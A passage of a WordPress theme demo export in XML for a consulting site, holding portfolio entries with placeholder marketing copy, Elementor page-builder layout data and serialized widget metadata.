r_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Financial Statements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/financial-statements/</link>
		<pubDate>Fri, 11 Sep 2020 04:46:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=814</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>814</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:46:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:46:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[financial-statements]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[815]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1deb4b19","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"19b383e9","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"500f054","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3071a763","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"828a94c","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"53d504ac","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"4d6cc997","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f023b1","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"177fdce1","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e8ca3c2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7f78bab3","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"409d65b1","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"30db82d2","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"40a8f280","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4dfc12a3","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6ec964ab","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"14da4924","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"effadd0","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"f283eeb","elType":"section","settings":[],"elements":[{"id":"e9efde4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9269a71","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6127863","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"adced6b","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"6ca3954","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"e1d9a84","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1ef5872","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"d3a4ea5","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"d314a83","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"10098c2","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"dada7c3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d97cbe2","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"43fefa8","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"06ef393","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"b5ec83e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"8d84fc7","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a2d5633","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"a399c91","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3d68ba7","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"74293fd","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b48951f","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"0207c38","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"abd9423","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"1229a57","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Insurance Finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/insurance-finance/</link>
		<pubDate>Fri, 11 Sep 2020 04:48:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=818</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 09, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
